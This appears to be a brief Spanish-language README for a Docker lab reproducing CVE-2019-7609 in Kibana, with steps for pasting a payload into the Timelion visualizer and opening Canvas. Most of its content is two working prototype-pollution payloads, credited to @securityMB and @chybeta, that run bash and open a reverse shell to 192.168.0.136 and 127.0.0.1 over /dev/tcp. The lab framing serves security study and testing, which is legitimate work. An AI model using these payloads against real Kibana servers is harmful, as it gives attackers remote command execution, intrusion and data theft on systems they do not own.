
configuración de laboratorio docker para kibana-7609
Configuración de laboratorio docker para kibana-7609
Referencia : https://github.com/mpgn/CVE-2019-7609
Abre Kibana
Pega uno de los siguientes payloads en el visualizador de Timelion
Haz clic en Run
En el panel izquierdo, haz clic en Canvas
¡Tu reverse shell debería aparecer! :)
payload por @securityMB
.es(*).props(label.proto.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//') .props(label.proto.env.NODE_OPTIONS='--require /proc/self/environ')
payload por @chybeta
.es(*).props(label.proto.env.AAAA='require("child_process").exec("bash -c 'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1'");//') .props(label.proto.env.NODE_OPTIONS='--require /proc/self/environ')